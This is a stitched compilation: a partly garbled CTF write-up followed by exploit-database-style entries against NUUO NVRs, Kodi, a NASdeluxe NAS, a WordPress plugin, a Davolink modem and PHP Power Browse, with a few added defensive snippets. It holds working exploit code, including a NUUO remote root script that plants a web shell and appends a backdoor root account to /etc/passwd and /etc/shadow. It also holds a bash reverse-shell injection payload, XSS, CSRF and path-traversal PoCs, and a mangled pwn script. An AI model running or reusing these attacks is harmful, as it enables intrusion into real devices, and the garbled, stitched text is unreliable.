#!/usr/bin/env python# - * - encoding: utf-8-* - '' '@file : exp.p.p.p.p.p.p.p.p.p.p.p.p.p.13:3933:07@author: lexsd6' '' '' '' '' '' '' '' '' '' '' '' '' '' '' '' '' '' '' '' *local_mote=0elf='./supercall'e=elf(elf)#context.log_level=' debug'context.arch=e.archip_port=['123.57.207.81', 16985] debug=lambda : gdb.attach(p)if local_mote===1 3360 P=Process(ELF)else : p=remote(ip_port [0], ip_port [-1])#0x000000000000026796 : pop rdi; retstack_addr=int(p.recvuntil( ',')[:-1], 16)stdin_addr=int(p.recv(), 16)log.info(hex(stack_addr))log.info(hex(stdin_addr))x=finder( '_ io_2_2_1_stdin_' ' 9: Local-46E93283FF531:E02A73AE5B5BA375410855(source from:/mnt/d/filewsl/supercall/libc-2.27.so)p.sendline( '1'*8+'2'*8+'3'*7)p.sendline( '\ x00'*0x10+'x'*8+p64(x.gg(num=0)) execve( '/bin/sh', rsp+0x40, environ) constraints: rsp0xf==0 rcx==null '' 'p.interactive()
Then cat the flag on the remote.
[+] Gadget: 0x4f3d5
[*] Switching to interactive mode
$ ls
bin dev flag lib lib32 lib64 supercall
$ cat f*
flag{2f3f3f3632-6484-4c00-82f3-a63e0d4340d9}
$
resnake
I found that the challenge binary is UPX-packed. After unpacking it, I opened it in IDA, reviewed it, and found a suspicious function that encrypts the flag.
int sub_40186f()
{
    char v1[256];   // [esp+18h] [ebp-910h]
    char dst[2048]; // [esp+118h] [ebp-810h]
    int j;          // [esp+918h] [ebp-10h]
    int i;          // [esp+91ch] [ebp-ch]

    sub_4021ad(22, 18);
    scanf("%s", v1);
    for (i = 0; v1[i]; ++i)
        ;
    sub_4017d2(v1, i);                 // fun2
    memset(dst, 0, 0x800u);
    sub_4015f7(v1, dst, i);            // fun1
    sub_4021ad(22, 20);
    for (j = 0; dst[j]; ++j)
    {
        if (dst[j] != a7g5d5baytmdlwl[j])
            return puts("Wrong, try again");
    }
    return puts(asc_405016);
}
Following into fun2:
int __cdecl sub_4017d2(int a1, int a2)
{
    int result; // eax
    int j;      // [esp+8h] [ebp-ch]
    int i;      // [esp+ch] [ebp-8h]

    for (i = 1; i <= 10; ++i)
    {
        for (j = 0; ; ++j)
        {
            result = *(unsigned __int8 *)(j + a1);
            if (!(_BYTE)result)
                break;
            if (a2 % i)
                *(_BYTE *)(j + a1) ^= (_BYTE)i + (_BYTE)j;
            else
                *(_BYTE *)(j + a1) ^= (unsigned __int8)(j % i) + (_BYTE)j;
        }
    }
    return result;
}
It takes the input string and transforms each character according to its position.
fun1 is a base64 encoding of the string:
while (v16 < a3)
{
    v3 = v13;
    v14 = v13 + 1;
    *(_BYTE *)(a2 + v3) = str[((signed int)*(unsigned __int8 *)(v16 + a1) >> 2) & 0x3f];
    v11 = 16 * *(_BYTE *)(v16 + a1) & 0x30;
    if (v16 + 1 == a3)
    {
        v4 = v14;
        v5 = v14 + 1;
        *(_BYTE *)(a2 + v4) = str[v11];
        *(_BYTE *)(v5 + a2) = '=';
        v6 = v5 + 1;
        v13 = v5 + 2;
        *(_BYTE *)(v6 + a2) = '=';
        break;
    }
    v7 = v14;
    v15 = v14 + 1;
    *(_BYTE *)(a2 + v7) = str[(((signed int)*(unsigned __int8 *)(v16 + 1 + a1) >> 4) & 0xf) | v11];
    v12 = 4 * *(_BYTE *)(v16 + 1 + a1) & 0x3c;
    if (v16 + 2 == a3)
    {
        *(_BYTE *)(a2 + v15) = str[v12];
        v8 = v15 + 1;
        v13 = v15 + 2;
        *(_BYTE *)(v8 + a2) = '=';
        break;
    }
    *(_BYTE *)(a2 + v15) = str[(((signed int)*(unsigned __int8 *)(v16 + 2 + a1) >> 6) & 3) | v12];
    v9 = v15 + 1;
    v13 = v15 + 2;
    *(_BYTE *)(a2 + v9) = str[*(_BYTE *)(v16 + 2 + a1) & 0x3f];
    v16 += 3;
}
However, while debugging I found that, before fun1 runs, another function modifies the value of the global variable str.
That function is as follows:
signed int sub_401536()
{
    char v0;           // ST13_1
    signed int result; // eax
    signed int v2;     // [esp+14h] [ebp-14h]
    int j;             // [esp+18h] [ebp-10h]
    int i;             // [esp+1ch] [ebp-ch]

    v2 = strlen("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/");
    for (i = 0; v2 / 2 > i; ++i)
    {
        for (j = 0; v2 - i - 1 > j; ++j)
        {
            if (str[j] > str[j + 1])
            {
                v0 = str[j];
                str[j] = str[j + 1];
                str[j + 1] = v0;
            }
        }
    }
    result = 1;
    dword_406060 = 1;
    return result;
}
So I wrote a script to reproduce that:
base_flag = []
# x = '7G5D5BAY+TMDLWLU5CDKMTLCJNWKNUGB2AQL3CMPPVF6DAP72SCOSL b'
x = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'  # str before the sort
v2 = len('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/')
'''
v0 = str[j];
str[j] = str[j + 1];
str[j + 1] = v0;
'''
for i in x:
    base_flag.append(ord(i))
print(base_flag)
for i in range(v2 // 2):
    for j in range(v2 - i - 1):
        if base_flag[j] > base_flag[j + 1]:
            v0 = base_flag[j]
            base_flag[j] = base_flag[j + 1]
            base_flag[j + 1] = v0
print(''.join(chr(c) for c in base_flag))
This gives the real str: ABCDEFGHIJKLMNOPQRST0123456789+/UVWXYZabcdefghijklmnopqrstuvwxyz
Reversing fun1 and fun2 from their source then yields the flag:
import base64

base64Table = 'ABCDEFGHIJKLMNOPQRST0123456789+/UVWXYZabcdefghijklmnopqrstuvwxyz'  # modified str
table2 = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'      # standard alphabet
# ciphertext as transcribed on this page; its case and tail were garbled in extraction
tmp = '7G5D5BAY+TMDLWLU5CDKMTLCJNWKNUGB2AQL3CMPPVF6DAP72SCOSL'
tmp2 = ''
for i in tmp:
    index = base64Table.index(i)
    tmp2 += table2[index]
k = base64.b64decode(tmp2 + '==')
kk = []
for i in range(len(k)):
    kk.append(k[i])
print(kk)
a2 = len(kk)
for i in range(1, 11):
    for j in range(len(kk)):
        print(str(a2 % i) + ' ' + str(i))
        if a2 % i != 0:
            kk[j] ^= (i + j)
        else:
            kk[j] ^= ((j % i) + j)
print(kk)
flag = ''
for i in kk:
    flag += chr(i)
print(flag)
flag{5E2200BC-F21A-5421-A90B-57DEC19FE196}
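The resnake pipeline above, reimplemented as an added example (not the write-up author's script) from the decompiled loops: the half-length bubble sort that permutes the base64 table, the position-dependent XOR of sub_4017d2 (an involution, since the mask depends only on length and position), and the custom-alphabet base64 of sub_4015f7, together with the inverse of the whole chain. It generalises beyond the one ciphertext in the write-up: any input can be encoded and decoded, and the sample plaintext here is constructed.

```python
"""resnake transforms and their inverse, reimplemented from the decompiled
loops in the write-up. Added example, not the author's script."""
import base64

STANDARD = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"


def permuted_alphabet(table: str = STANDARD) -> str:
    """sub_401536: a bubble sort that runs only len/2 outer passes, so the
    32 largest symbols end up sorted at the tail and the rest keep their
    relative order."""
    buf = list(table)
    n = len(buf)
    for i in range(n // 2):
        for j in range(n - i - 1):
            if buf[j] > buf[j + 1]:
                buf[j], buf[j + 1] = buf[j + 1], buf[j]
    return "".join(buf)


def xor_layer(data: bytes) -> bytes:
    """sub_4017d2: for i in 1..10, XOR byte j with i+j when len % i != 0,
    otherwise with (j % i) + j. The mask depends only on (len, i, j), so
    applying it twice is the identity: this is both encrypt and decrypt.
    The binary stops at the first NUL byte; here the length is explicit,
    as in the write-up's own decoder."""
    buf = bytearray(data)
    n = len(buf)
    for i in range(1, 11):
        for j in range(n):
            if n % i:
                buf[j] ^= (i + j) & 0xFF
            else:
                buf[j] ^= ((j % i) + j) & 0xFF
    return bytes(buf)


def encode(plain: bytes, alphabet: str) -> str:
    """fun2 then fun1: XOR layer, then standard base64 layout with the
    permuted symbol table."""
    std = base64.b64encode(xor_layer(plain)).decode()
    return std.translate(str.maketrans(STANDARD, alphabet))


def decode(cipher: str, alphabet: str) -> bytes:
    """Map the custom symbols back to the standard alphabet, base64-decode,
    then undo the XOR layer."""
    std = cipher.translate(str.maketrans(alphabet, STANDARD))
    return xor_layer(base64.b64decode(std))


if __name__ == "__main__":
    table = permuted_alphabet()
    print(table)
    sample = b"flag{constructed-sample-not-the-real-one}"  # constructed input
    c = encode(sample, table)
    print(c)
    print(decode(c, table))
```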
Misc
Questionnaire
Fill in the form and you get the flag:
flag{Let's bring a sense of security to the world}
helloshark
Opened the picture in 010 Editor and found many "PK" markers in the hex, so a file is appended to the image; split it off with foremost. Sure enough, a compressed archive is hidden inside, but the archive is password-protected, and the hint says the password is in the picture.
Guessing that the picture has LSB steganography, use the tool zsteg to check.
You can see that the password is @91902AF23C#276C2FC7EAC615739CC7C0. Decompress the archive and open the packet capture to follow the TCP stream.
Get flag: flag{a4e0a418-fced-4b2d-9d76-fdc9053d69a1}
Photo
Password: 9527
Unzip and open the Excel file.
It consists of six parts; the left edge and the bottom edge are all 1s. First combine the data of the six parts, then set the row height and column width so the cells form a QR code, and add a conditional format: when a cell contains 1, fill its background black.
WeChat cannot scan it, so take a screenshot of the QR code.
It is a DataMatrix code; the online decoding tool http://boy.co.ua/decode.php gives zfua{b3s1o9in1nw0halunofunc0hm1}, a flag-like string. Caesar-cipher decryption
gives flag{h3y1u9ot1tc0ngratulati0ns1}
FROM:https://LEXSD6.GITHUB.IO/2021/11/27/2021%E5%B9%B4%E6%98%A5%E7%A7%8B%E6%9D%AFE7%BD%91%E7%BBB%9C%E5%A E%89%E5%85%A8%E8%81%94%E8%B5%9B%E7%A7%8B%E5%AD%A3%E8%B5%9B%E5%8B%87%E8%80%85%E5%B1%B1%E5%B3%B0/#CHRYPTO
<!--
NUUO CSRF Add Admin Exploit
Vendor: NUUO Inc.
Product web page: http://www.nuuo.com
Affected version: <=3.0.8 (NE-4160, NT-4040)
Summary: NUUO NVRmini 2 is the lightweight, portable NVR solution with NAS
functionality. Setup is simple and easy, with automatic port forwarding
settings built in. NVRmini 2 supports POS integration, making this the perfect
solution for small retail chain stores. NVRmini 2 also comes fully equipped as
a NAS, so you can enjoy the full storage benefits like easy hard drive hot-swapping
and RAID functions for data protection. Choose NVR and know that your valuable video
data is safe, always.
Desc: The application interface allows users to perform certain actions via HTTP
requests without performing any validity checks to verify the requests. This can be
exploited to perform certain actions with administrative privileges if a logged-in
user visits a malicious web site.
Tested on: GNU/Linux 3.0.8 (armv7l)
GNU/Linux 2.6.31.8 (armv5tel)
lighttpd/1.4.28
PHP/5.5.3
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5349
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5349.php
14.01.2016
-->
<!-- 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 -->
<html>
<body>
<form action="http://10.0.0.17/users_xml.php">
<input type="hidden" name="_password2" value="admin" />
<input type="hidden" name="addusername" value="csrfadmin" />
<input type="hidden" name="password" value="admin" />
<input type="hidden" name="cmd" value="adduser" />
<input type="hidden" name="group" value="poweruser" />
<input type="hidden" name="displaygroup" value="power user" />
<input type="hidden" name="magic" value="574" />
<input type="hidden" name="liveacc" value="1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16" />
<input type="hidden" name="pbacc" value="1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16" />
<input type="hidden" name="ptzacc" value="1" />
<input type="hidden" name="ioacc" value="1" />
<input type="hidden" name="backupacc" value="1" />
<input type="hidden" name="deleteacc" value="1" />
<input type="hidden" name="emapeacc" value="1" />
<input type="hidden" name="remotalkacc" value="1" />
<input type="hidden" name="logacc" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
#!/usr/bin/env python
#
#
# NUUO Remote Root Exploit
#
#
# Vendor: NUUO Inc.
# Product web page: http://www.nuuo.com
# Affected version: <=3.0.8
#
# Summary: NUUO NVRmini 2 is the lightweight, portable NVR solution with NAS
# functionality. Setup is simple and easy, with automatic port forwarding
# settings built in. NVRmini 2 supports POS integration, making this the perfect
# solution for small retail chain stores. NVRmini 2 also comes fully equipped as
# a NAS, so you can enjoy the full storage benefits like easy hard drive hot-swapping
# and RAID functions for data protection. Choose NVR and know that your valuable video
# data is safe, always.
#
# Desc: NUUO NVRmini, NVRmini2, Crystal and NVRSolo suffers from an unauthenticated command
# injection vulnerability. Due to an undocumented and hidden debugging script, an attacker
# can inject and execute arbitrary code as the root user via the 'log' GET parameter in the
# '__debugging_center_utils___.php' script.
#
# -----------------------------------------------------
# $ nuuo.py 10.0.0.17 80
# [*] ==============================================
# [*] NUUO NVR/DVR/NDVR Remote Root Exploit
# [*] Zero Science Lab - http://www.zeroscience.mk
# [*] ==============================================
# [*] Backdoor detected!
# [*] Add root user (y/n)? n
# [*] Press [ ENTER ] to start root shell...
#
# root@nuuo:~# id
# uid=0(root) gid=0(root)
#
# root@nuuo:~# exit
#
# [*] Removing raidh.php file
# [*] Session terminated!
#
# $
# -----------------------------------------------------
#
# Tested on: GNU/Linux 3.0.8 (armv7l)
# GNU/Linux 2.6.31.8 (armv5tel)
# lighttpd/1.4.28
# PHP/5.5.3
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# Zero Science Lab - http://www.zeroscience.mk
#
#
# Advisory ID: ZSL-2016-5348
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5348.php
# NSE Script: http://www.zeroscience.mk/codes/nuuo-backdoor.nse
# https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40209.zip
#
#
# 14.01.2016
#
import os######
import sys#####
import time####
import urllib##
import binascii
import requests
__author__ = 'lqwrm'
def persist(host,port,hexy,clean):
pwd = '''echo 'roOt:x:0:0:PWNED account:/:/bin/bash' >> /etc/passwd'''
sdw = '''echo 'roOt:$1$MJOnV/Y3$tDnMIBMy0lEQ2kDpfgTJP0:16914:0:99999:7:::' >> /etc/shadow'''
print '[*] Adding user \'roOt\' with password \'rewt\' in passwd file.'
requests.get('http://'+host+':'+port+'/raidh.php?cmd='+pwd)
time.sleep(2)
print '[*] Updating shadow file.'
requests.get('http://'+host+':'+port+'/raidh.php?cmd='+sdw)
time.sleep(2)
print '[*] Shell awaits: ssh roOt@'+host
requests.get('http://'+host+':'+port+'/raidh.php?cmd='+urllib.quote(clean))
exit(0)
def check(host,port,hexy):
try:
r = requests.get('http://'+host+':'+port+'/'+hexy, allow_redirects=False)
if r.status_code == 200:
print '[*] Backdoor detected!'
pass
else:
print '[*] No backdoors here. :('
exit(0)
except Exception:
print '[*] Could not connect.'
exit(0)
def main():
print '[*] =============================================='
print '[*] NUUO NVR/DVR/NDVR Remote Root Exploit'
print '[*] Zero Science Lab - http://www.zeroscience.mk'
print '[*] =============================================='
if (len(sys.argv) <= 2):
print '[*] Usage: nuuo.py <ipaddress> <port>'
exit(0)
host = sys.argv[1]
port = sys.argv[2]
dbgcu = '5f5f64'#
dbgcu+= '656275'#
dbgcu+= '676769'#
dbgcu+= '6e675f'#
dbgcu+= '63656e'#
dbgcu+= '746572'#
dbgcu+= '5f7574'#
dbgcu+= '696c73'#
dbgcu+= '5f5f5f'#
dbgcu+= '2e7068'#
dbgcu+= '70'###'#
hexy = binascii.unhexlify(dbgcu)
check (host,port,hexy)
payload = '''echo "<?php system(\$_REQUEST[\'cmd\']); ?>" > raidh.php'''
requests.get('http://'+host+':'+port+'/'+hexy+'?log=1337;' + payload)
clean = 'rm raidh.php'
a1 = raw_input('[*] Add root user (y/n)? ')
if a1.strip() == 'y' or a1.strip() == 'Y':
persist (host,port,hexy,clean)
else:
pass
print '[*] Press [ ENTER ] to start root shell...'
raw_input()
while True:
try:
cmd = raw_input('root@nuuo:~# ')
if cmd.strip() == '':
print '[*] Give me a command!\n'
continue
else:
e = requests.get('http://'+host+':'+port+'/raidh.php?cmd='+urllib.quote(cmd))
print e.text
if cmd.strip() == 'exit':
print '[*] Removing raidh.php file'
requests.get('http://'+host+':'+port+'/raidh.php?cmd='+urllib.quote(clean))
print '[*] Session terminated!'
break
except Exception:
break
if __name__ == "__main__":
main()
# Exploit Title: Kodi 16.1 Web Server Remote DoS
# Date: 06/08/2016
# Exploit Author: Guillaume Kaddouch
# Twitter: @gkweb76
# Blog: https://networkfilter.blogspot.com
# GitHub: https://github.com/gkweb76/exploits
# Vendor Homepage: https://kodi.tv/
# Software Link: http://mirrors.kodi.tv/releases/win32/kodi-16.1-Jarvis.exe
# Version: 16.1
# Tested on: Windows 7 Family x64 (FR)
# Category: DoS
"""
Disclosure Timeline:
--------------------
2016-08-02: Vulnerability discovered
2016-08-04: Vendor contacted
2016-08-04: Developer answered. Kodi v16 is End Of Life and will not be fixed.
2016-08-06: Exploit published.
Description :
-------------
A remote Denial Of Service exists in Kodi 16.1 (Jarvis) embedded web server when sending a specially crafted GET request.
The web server is disabled by default.
Instructions:
-------------
- Start Kodi and enable the web server in System, Services, Web server.
- Run this exploit locally or from your remote attacking machine.
"""
import socket
host = "192.168.135.129"
port = 8080
junk = '../' * 10
buffer = "GET " + junk + " HTTP/1.1\r\n"
buffer += "\r\n\r\n"
try:
print "[*] Connecting to %s:%d" % (host, port)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
print "[*] Sending buffer... (%d bytes)" % len(buffer)
s.send(buffer)
s.close()
print "[*] Done."
except:
print "[-] Error connecting"
Advisory ID: SYSS-2016-065
Product: NASdeluxe NDL-2400r
Vendor: Starline Computer GmbH
Affected Version(s): 2.01.10
Tested Version(s): 2.01.09
Vulnerability Type: OS Command Injection (CWE-78)
Risk Level: High
Solution Status: no fix (product reached EOL more than 3 years ago)
Vendor Notification: 2016-07-04
Public Disclosure: 2016-08-03
CVE Reference: Not assigned
Author of Advisory: Klaus Eisentraut, SySS GmbH, https://www.syss.de/advisories/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Overview:
The product "NASdeluxe NDL-2400r" [3] is vulnerable to OS Command Injection
as root. No credentials are required to exploit this vulnerability.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Vulnerability Details / Proof-of-Concept:
The language parameter in the web interface login request of the product
"NASdeluxe NDL-2400r" is vulnerable to an OS Command Injection as root.
The SySS GmbH sent the following HTTPS request to the web interface:
~~~~~
POST /usr/usrgetform.html?name=index HTTP/1.1
Host: 192.168.1.1
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 97
lang=||`bash+-i+>%26+/dev/tcp/192.168.1.2/443+0>%261`&username=&pwd=&site=web_disk&login_btn=Einloggen
~~~~~
After sending the request, a reverse shell connected back:
~~~~~
# nc -lvvp 443
Listening on any address 443 (https)
Connection from 192.168.1.1:49070
bash: no job control in this shell
bash-3.00# whoami
root
bash-3.00# cat /img/version
2.01.09
~~~~~
The tested firmware version was 2.01.09. The most current version is
2.01.10 according to the web page of the vendor [3]. However there are
no hints of a security update in the release notes [4]. Thus, the SySS
GmbH assumes that this vulnerability is likely also present in the most
current firmware version from 2009-10-22.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Solution:
The product reached end-of-life (EOL) status more than three years ago.
Thus, no patch will be provided by the vendor.
It is highly recommended to migrate to one of the newer and still
supported NAS solutions which are (according to Starline Computer GmbH)
not affected by this vulnerability.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Disclosure Timeline:
2016-06-29: Vulnerability discovered
2016-07-04: asked info@starline.de for contact person (no answer)
2016-07-22: sent this advisory to info@starline.de
2016-07-22: response from vendor: won't fix (product reached EOL >3 years)
2016-08-03: public disclosure
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
References:
[1] SySS GmbH, SYSS-2016-065
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-065.txt
[2] SySS GmbH, SySS Responsible Disclosure Policy
https://www.syss.de/en/news/responsible-disclosure-policy/
[3] NASdeluxe Homepage
https://www.nasdeluxe.com/
[4] NDL-2400R Firmware Release Notes
https://www.nasdeluxe.com/wp-content/uploads/2008/12/NDL-2400R_NDL-2500T_FWRN_v2_01_10.171.pdf
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Credits:
This security vulnerability was found by Klaus Eisentraut of the SySS
GmbH.
E-Mail: klaus.eisentraut@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Klaus_Eisentraut.asc
Key ID: 0xBAC677AE
Key Fingerprint: F5E8 E8E1 A414 4886 0A8B 0411 DAB0 4DB5 BAC6 77AE
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Disclaimer:
The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web
site.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Copyright:
Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en
Stored Cross-Site Scripting vulnerability in Count per Day WordPress Plugin
Abstract
A Cross-Site Scripting vulnerability was found in the Count per Day WordPress Plugin. This issue can be exploited by an unauthenticated attacker and allows an attacker to perform a wide variety of actions, such as stealing users' session tokens, or performing arbitrary actions on their behalf. In order to exploit this issue, the attacker has to lure/force a victim into opening a malicious website/link.
Contact
For feedback or questions about this advisory mail us at sumofpwn at securify.nl
The Summer of Pwnage
This issue has been found during the Summer of Pwnage hacker event, running from July 1-29. A community summer event in which a large group of security bughunters (worldwide) collaborate in a month of security research on Open Source Software (WordPress this time). For fun. The event is hosted by Securify in Amsterdam.
OVE ID
OVE-20160717-0001
Tested versions
This issue was successfully tested on Count per Day WordPress Plugin version 3.5.4.
Fix
This issue is resolved in Count per Day version 3.5.5.
Introduction
The Count per Day WordPress Plugin shows reads and visitors per page, visitors today, yesterday, last week, last months and other statistics. A Cross-Site Scripting vulnerability was found in the Count per Day WordPress Plugin. This issue can be exploited by an unauthenticated attacker and allows an attacker to perform a wide variety of actions, such as stealing users' session tokens, or performing arbitrary actions on their behalf. In order to exploit this issue, the attacker has to lure/force a victim into opening a malicious website/link.
Details
When the Referer header is manipulated to carry a javascript: URL, it is rendered on the admin page within the referers list as an href attribute. When an admin (or any user above author level) clicks on it, the XSS gets executed.
Tags get stripped, so it is not possible to execute the XSS directly on load. Single and double quotes are escaped, but this can be worked around. Example:
Referer: javascript:c=String.fromCharCode;alert(c(83)+c(117)+c(109)+c(79)+c(102)+c(80)+c(119)+c(110)+c(46)+c(110)+c(108))
The referer list shows the top 20, but it is easy to get the attack referer into the top by looping with unique X-Forwarded-For IPs. By default referers are stored (this can be turned off in the plugin's settings). Up to 150 characters of the referer are stored (configurable up to a maximum of 500).
Proof of concept
GET / HTTP/1.1
Host: <target>
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8,nl;q=0.6
x-forwarded-for: 1.1.1.5
Referer: javascript:c=String.fromCharCode;alert(c(83)+c(117)+c(109)+c(79)+c(102)+c(80)+c(119)+c(110)+c(46)+c(110)+c(108))
Connection: close
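Escaping quotes and stripping tags, as the plugin did, leaves a javascript: referer intact once it lands in an href. The following added example (not Count per Day's code) is the check a defender wants before a stored referer is turned into a link: normalise the way browsers do (drop leading controls and spaces, strip embedded control characters, compare the scheme case-insensitively) and allow only http and https. The sample referers are constructed.

```python
"""Scheme allow-list for stored referers rendered as links.
Added example, not the plugin's code."""
import re
from urllib.parse import urlsplit

SAFE_SCHEMES = {"http", "https"}
# Browsers ignore leading C0 controls/spaces and strip tab/newline anywhere
# in a URL, so "  JavaScript:" and "java\tscript:" are javascript: URLs.
_LEADING_JUNK = re.compile(r"^[\x00-\x20]+")
_EMBEDDED_CTRL = re.compile(r"[\x00-\x1f]")


def safe_referer_href(referer: str):
    """Return a cleaned referer fit for an href, or None if it must not be
    linked (it can still be displayed as escaped text)."""
    s = _EMBEDDED_CTRL.sub("", _LEADING_JUNK.sub("", referer))
    parts = urlsplit(s)
    if parts.scheme.lower() not in SAFE_SCHEMES or not parts.netloc:
        return None
    return s


# Constructed sample of what a top-referer list might hold, including the
# payload shape from the advisory and a few normalisation edge cases.
SAMPLE_REFERERS = [
    "https://example.com/blog/post",
    "javascript:c=String.fromCharCode;alert(c(83)+c(117)+c(109))",
    "  JaVaScRiPt:alert(document.cookie)",
    "java\tscript:alert(1)",
    "//example.net/scheme-relative",
    "data:text/html,hello",
]


def linkable(referers):
    """Keep only the referers that may be rendered as links."""
    return [r for r in referers if safe_referer_href(r) is not None]


if __name__ == "__main__":
    for r in SAMPLE_REFERERS:
        print(repr(r), "->", safe_referer_href(r))
```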
===================================================================
Title: Unauthenticated admin password change
Product: Davolink modem
Tested model: DV-2051
Vulnerability Type: Missing Function Level Access Control [CWE-306]
Risk Level: High
Solution Status: No fix available
Discovered and Provided: Eric Flokstra
===================================================================
[-] About the Product:
The Davolink DV-2051 is an ADSL modem with 4 Fast Ethernet ports,
Wireless Access Point and VoIP (2 times FXS).
[-] Advisory Details:
Basic authentication is in place to authenticate the administrative user
against the web application. To change the administrator password the
old password must be provided, which is validated by JavaScript. By
intercepting a successful password reset request the JavaScript
validation can be bypassed. It was also noticed that authorisation checks
are missing on the password reset functionality. Combining these
vulnerabilities enables unauthenticated users to change the admin
password with a single request.
[-] Proof of Concept:
The following request can be used to change the admin password to the
value ’FooBar’:
192.168.1.1/password.cgi?usrPassword=FooBar
========================================================
Title: Lack of CSRF protection
Product: Davolink modem
Tested model: DV-2051
Vulnerability Type: Cross-Site Request Forgery [CWE-352]
Risk Level: Medium
Solution Status: No fix available
Discovered and Provided: Eric Flokstra
========================================================
[-] About the Product:
The Davolink DV-2051 is an ADSL modem with 4 Fast Ethernet ports,
Wireless Access Point and VoIP (2 times FXS).
[-] Advisory Details:
The web application enables users to set a password in order for clients
to connect to the SSID. Currently no measures against Cross-Site Request
Forgery have been implemented and therefore users can be tricked into
submitting requests without their knowledge or consent. From the
application's point of view these requests are legitimate requests from
the user and they will be processed as such. This can result in for
example changing the WPA2 password.
[-] Proof of Concept:
The following link can be used to trick a logged in user to set the WPA2
Pre Shared Key to ‘FooBar01’.
192.168.1.1/wlsecurity.wl?wlAuthMode=psk2&wlAuth=0&wlWpaPsk=FooBar01&wlWpaGtkRekey=0&wlNetReauth=36000&wlWep=disabled&wlWpa=tkip+aes&wlKeyBit=0&wlPreauth=0
===============================================================
Title: Multiple persistent Cross-Site Scripting vulnerabilities
Product: Davolink modem
Tested model: DV-2051
Vulnerability Type: Cross-Site Scripting [CWE-79]
Risk Level: Medium
Solution Status: No fix available
Discovered and Provided: Eric Flokstra
===============================================================
[-] About the Product:
The Davolink DV-2051 is an ADSL modem with 4 Fast Ethernet ports,
Wireless Access Point and VoIP (2 times FXS).
[-] Advisory Details:
The web application enables users to add virtual servers to direct
incoming traffic from the WAN side to an internal server with a private IP
address on the LAN side. It was noticed that insufficient validation is
performed in several places, such as the 'srvName' parameter which is
sent with the request when adding a new virtual server. This
vulnerability makes it possible to remotely execute arbitrary scripting
code in the target user's web browser by adding a persistent JavaScript
payload to the application.
[-] Proof of Concept:
The following request can be used as a PoC: it opens port 4444 to an
internal IP address. An iframe is added to the 'srvName' field and
displays a pop-up box.
192.168.1.1/scvrtsrv.cmd?action=add&srvName=FooBar<iframe%20onload=alert(0)>&srvAddr=192.168.1.100&proto=1,&eStart=4444,&eEnd=4444,iStart=4444,&iEnd=4444,
[-] Disclosure Timeline:
[04 06 2016]: Vendor notification
[07 06 2016]: Vulnerability confirmed. No fix will be released.
[16 07 2016]: Public Disclosure
# Exploit Title: PHP Power Browse v1.2 - Path Traversal
# Google Dork: intitle:PHP Power Browse inurl:browse.php
# Exploit Author: Manuel Mancera (sinkmanu) | sinkmanu (at) gmail (dot) com
# Software URL: https://github.com/arzynik/PHPPowerBrowse
# Version: 1.2
# Vulnerability Type : Path traversal
# Severity : High
### Description ###
This file browser is vulnerable to path traversal, which allows an
attacker to access files and directories that are stored outside the
web root folder.
### Exploit ###
http://site/browse.php?p=source&file=/etc/passwd
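The fix for this class of bug is to resolve the requested path and refuse anything that does not stay inside the browser's root. The following is an added example in Python, not code from PHP Power Browse (which is written in PHP); it assumes the web root is a directory on the local filesystem and builds a throwaway one for the demonstration.

```python
import os
import tempfile


class TraversalError(Exception):
    """Raised when a requested path resolves outside the allowed root."""


def resolve_within_root(root, requested):
    """Return the real path for `requested` only if it stays inside `root`.

    The comparison is made on the resolved path, so '../' sequences, an
    absolute path such as '/etc/passwd' and a symlink pointing out of the
    root are all rejected by the same test."""
    if os.path.isabs(requested):
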